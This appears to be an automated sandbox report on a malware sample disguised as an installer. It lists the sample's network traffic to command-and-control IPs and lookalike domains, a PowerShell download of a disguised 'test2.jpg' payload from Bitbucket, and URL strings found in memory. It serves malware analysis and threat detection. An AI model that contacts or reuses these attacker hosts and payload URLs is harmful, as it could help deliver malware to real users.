                            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231678fbb38f842a1cec7a86d87bdb6546ad12dac0290eea11dd1729366be8ea43a8ec4cde8eec906920dff15bd3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935948c17231f1d805 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
                            Source: global trafficHTTP traffic detected: GET /success?substr=two&s=uniq&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: UHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: UHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: UHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /public_files/hkkcrng.txt HTTP/1.1Host: 62.60.226.112Connection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: time.windows.com
                            Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                            Source: global trafficDNS traffic detected: DNS query: ofice365.github.io
                            Source: global trafficDNS traffic detected: DNS query: starrynsightsky.icu
                            Source: global trafficDNS traffic detected: DNS query: hardswarehub.today
                            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hardswarehub.today
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Mar 2025 08:48:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 15304Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "76833ee21f86ad3df575d246d99cf520"X-Dc-Location: Micros-3X-Served-By: 671a959e5123X-Version: 1cd415ec70aeX-Static-Version: 1cd415ec70aeX-Request-Count: 1166X-Render-Time: 0.06097984313964844X-B3-Traceid: a284af06471f4a639162b5c565a291cbX-B3-Spanid: 94b1b99485f5ef99X-Frame-Options: SAMEORIGINContent-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com app.pendo.io data.pendo.io pendo-static-6291417196199936.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-obj
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Mar 2025 08:48:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6H9OXr74vCol1syQNRPzHeRJOISSE%2BOwKq7ACY3eUQhu6PtSCt6aXMzpdg%2BBwFXBIdSbKndxEHcH8h0qfKNuMeNFX8cnmMTPXo9x6%2FrpVqAW36bmNbtQxgK3bGnBlVp3oZBJ80%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 919765803ad3c358-EWR
                            Source: is-DUVGJ.tmp.12.dr, is-SE3Q7.tmp.12.drString found in binary or memory: http://icu-project.org
                            Source: powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000012.00000002.2277471538.0000021B90B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: svchost.exe, 00000000.00000002.1365641239.00000232A5013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comc
                            Source: N7LnRW81Rfq.tmp, 0000000C.00000002.2531767365.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000000.1820621963.0000000000686000.00000002.00000001.01000000.0000000B.sdmp, ssdtoolbox.exe, 0000000D.00000003.1821123367.0000000002657000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe.12.dr, SSDToolBox.exe.13.dr, is-208MU.tmp.12.drString found in binary or memory: http://www.countnow.ru
                            Source: N7LnRW81Rfq.tmp, N7LnRW81Rfq.tmp, 0000000C.00000000.1802140325.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-SDRVH.tmp.12.dr, N7LnRW81Rfq.tmp.11.drString found in binary or memory: http://www.innosetup.com/
                            Source: N7LnRW81Rfq.exe, N7LnRW81Rfq.exe, 0000000B.00000002.2527238881.0000000000401000.00000020.00000001.01000000.00000005.sdmp, N7LnRW81Rfq.exe.9.dr, UNIQTWO[1].file.9.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                            Source: N7LnRW81Rfq.exe, 0000000B.00000002.2527238881.0000000000401000.00000020.00000001.01000000.00000005.sdmp, N7LnRW81Rfq.exe.9.dr, UNIQTWO[1].file.9.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                            Source: N7LnRW81Rfq.exe, 0000000B.00000003.1801703785.00000000021D8000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.exe, 0000000B.00000003.1801570982.0000000002400000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, N7LnRW81Rfq.tmp, 0000000C.00000000.1802140325.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-SDRVH.tmp.12.dr, N7LnRW81Rfq.tmp.11.drString found in binary or memory: http://www.remobjects.com/ps
                            Source: N7LnRW81Rfq.exe, 0000000B.00000003.1801703785.00000000021D8000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.exe, 0000000B.00000003.1801570982.0000000002400000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000000.1802140325.0000000000401000.00000020.00000001.01000000.00000006.sdmp, is-SDRVH.tmp.12.dr, N7LnRW81Rfq.tmp.11.drString found in binary or memory: http://www.remobjects.com/psU
                            Source: N7LnRW81Rfq.tmp, 0000000C.00000002.2531767365.0000000005CCA000.00000004.00001000.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000000.1820621963.00000000006B1000.00000002.00000001.01000000.0000000B.sdmp, ssdtoolbox.exe, 0000000D.00000003.1821123367.0000000002681000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe.12.dr, SSDToolBox.exe.13.dr, is-208MU.tmp.12.drString found in binary or memory: http://www.ulead.com
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/C
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb386926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb387926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2531042833.0000000000984000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb388926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb389926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2531042833.0000000000984000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb38a926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb38b926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb38c926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2531042833.0000000000984000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb38d926d19fe6595cd66946951e91fcd85260
                            Source: ssdtoolbox.exe, 0000000D.00000002.2531042833.0000000000984000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmp, ssdtoolbox.exe, 0000000D.00000002.2531042833.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb38f842a1cec7a86d87bdb6546ad12dac0290
                            Source: ssdtoolbox.exe, 0000000D.00000002.2531042833.00000000008A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ab312136e731defa6231678fbb38f926d19fe6595cd66946851e91fcd85241
                            Source: ssdtoolbox.exe, 0000000D.00000002.2543648594.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/allowedCert_OS_1
                            Source: ssdtoolbox.exe, 0000000D.00000002.2531042833.0000000000984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/en-GB
                            Source: ssdtoolbox.exe, 0000000D.00000002.2531042833.0000000000984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/priseCertificates
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.atlassian.com
                            Source: powershell.exe, 00000012.00000002.2277471538.0000021B90B53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2277471538.0000021B90B0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.bitbucket.org
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
                            Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/css/entry/ad
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/css/entry/ap
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/css/entry/ve
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/css/themes/a
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/dist/webpack
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/img/default_
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/img/logos/bi
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/1cd415ec70ae/jsi18n/en/dj
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                            Source: powershell.exe, 00000012.00000002.2277471538.0000021B910A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.status.atlassian.com/
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bqlf8qjztdtr.statuspage.io
                            Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                            Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365013157.00000232A505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365868415.00000232A5081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                            Source: svchost.exe, 00000000.00000003.1364793254.00000232A5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365832294.00000232A5068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                            Source: svchost.exe, 00000000.00000002.1365868415.00000232A5081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                            Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365013157.00000232A505A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                            Source: svchost.exe, 00000000.00000003.1364793254.00000232A5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365832294.00000232A5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365684533.00000232A5029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                            Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                            Source: svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                            Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                            Source: svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                            Source: svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                            Source: svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                            Source: svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                            Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                            Source: svchost.exe, 00000000.00000003.1364793254.00000232A5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365832294.00000232A5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365684533.00000232A5029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hardswarehub.today/
